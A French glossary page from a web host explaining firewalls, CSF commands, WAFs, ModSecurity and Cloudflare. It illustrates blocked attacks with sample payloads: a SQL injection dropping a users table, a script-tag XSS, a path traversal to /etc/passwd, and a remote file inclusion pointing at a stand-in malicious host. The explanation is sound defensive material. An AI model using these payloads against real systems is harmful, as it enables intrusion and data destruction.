Aller au contenu principal
Gaprod

Glossaire

Firewall & WAF

Le Firewall (pare-feu) filtre le trafic réseau entrant et sortant selon des règles prédéfinies pour bloquer les accès non autorisés. Le WAF (Web Application Firewall) est un pare-feu spécialisé pour les applications web qui analyse le trafic HTTP/HTTPS et bloque les attaques ciblant les vulnérabilités des applications (injection SQL, XSS, etc.).

Qu'est-ce qu'un Firewall ?

Un firewall (pare-feu) est un système de sécurité réseau qui surveille et contrôle le trafic entrant et sortant selon un ensemble de règles de sécurité prédéfinies. Il crée une barrière entre votre réseau ou serveur et le reste d'Internet.

Types de firewalls

Firewall réseau (Network Firewall) Opère aux couches réseau et transport (OSI L3/L4). Il filtre selon :

  • Adresses IP source/destination
  • Ports TCP/UDP
  • Protocoles (TCP, UDP, ICMP)
  • Direction du flux (entrant, sortant)

Firewall d'application (Application Firewall / WAF) Opère à la couche applicative (OSI L7). Il analyse le contenu des requêtes HTTP pour détecter des patterns d'attaque.

Stateful vs Stateless

  • Stateless — Examine chaque paquet indépendamment
  • Stateful — Suit l'état des connexions TCP pour une protection plus intelligente

CSF : le Firewall pour serveurs Linux

CSF (ConfigServer Security & Firewall) est le pare-feu le plus populaire pour les serveurs Linux hébergeant cPanel/WHM. Il s'intègre directement dans l'interface WHM et offre :

  • Blocage par IP, plage d'IP ou pays
  • Protection contre les attaques par force brute (Fail2Ban intégré via LFD)
  • Limites de connexions simultanées par IP
  • Détection des processus suspects
  • Alertes par email en temps réel
  • Port knocking pour l'accès SSH

Exemple de règle CSF :

# Bloquer une IP spécifique
csf -d 185.220.101.50

# Autoriser une IP dans la whitelist
csf -a 1.2.3.4

# Redémarrer le pare-feu
csf -r

WAF : Web Application Firewall

Un WAF analyse les requêtes HTTP/HTTPS à la recherche de patterns malveillants avant qu'elles n'atteignent votre application web. C'est le seul mécanisme capable de bloquer les attaques de couche applicative.

Les attaques que le WAF bloque

Injection SQL (SQLi)

-- Tentative d'injection SQL dans un formulaire
' OR '1'='1'; DROP TABLE users; --

Le WAF détecte ces patterns et bloque la requête avant qu'elle n'atteigne la base de données.

Cross-Site Scripting (XSS)

<script>document.cookie='session='+document.cookie</script>

Le WAF neutralise les tentatives d'injection de scripts malveillants.

Path Traversal

../../etc/passwd

Tentative d'accès à des fichiers système hors du répertoire web.

Remote File Inclusion (RFI)

?file=http://malicious.com/backdoor.php

Tentative d'exécution de code PHP distant.

Brute Force Détection des tentatives répétées d'authentification (wp-login.php, xmlrpc.php).

ModSecurity : le WAF open-source pour Apache/Nginx/LiteSpeed

ModSecurity est le WAF open-source de référence pour les serveurs web Apache, Nginx et LiteSpeed. Il est utilisé par des millions de serveurs dans le monde.

ModSecurity utilise des jeux de règles (rulesets) pour identifier les attaques :

  • OWASP CRS (Core Rule Set) — Le jeu de règles de référence, maintenu par l'OWASP
  • Comodo WAF — Alternative commerciale
  • Imunify360 — Solution de sécurité complète intégrant ModSecurity
# Exemple de configuration ModSecurity (mode détection uniquement)
SecRuleEngine DetectionOnly
SecRequestBodyAccess On
SecResponseBodyAccess On

Cloudflare WAF

Pour une protection sans installation sur le serveur, Cloudflare propose un WAF géré en mode cloud. Il filtre le trafic avant qu'il n'atteigne votre serveur, avec des règles mises à jour en temps réel par les équipes de sécurité Cloudflare.

Plans Cloudflare et WAF :

  • Plan Free — Règles de sécurité basiques
  • Plan Pro — WAF avec OWASP ruleset
  • Plan Business et Enterprise — Règles personnalisées avancées

WAF et hébergement Gaprod

Les serveurs Gaprod sont protégés par ModSecurity avec les règles OWASP CRS activées par défaut. Cette protection opère de manière transparente, bloquant les attaques courantes sans intervention de votre part.

Pour une protection renforcée sur vos sites critiques, nous recommandons d'activer Cloudflare Pro en complément, qui ajoute une couche WAF cloud avec mises à jour en temps réel.

WAF et faux positifs

Un WAF trop agressif peut bloquer du trafic légitime ("faux positifs"). Si vous constatez des erreurs 403 inexpliquées sur votre site, c'est souvent ModSecurity qui bloque une requête légitime. Consultez les journaux ModSecurity dans cPanel (Journaux d'erreurs) pour identifier et mettre en liste blanche les règles générant des faux positifs.

Prêt à démarrer avec Gaprod ?

Hébergement web, VPS et solutions cloud 100% français, avec support expert inclus.

30j rembourséMigration gratuiteSupport 7j/7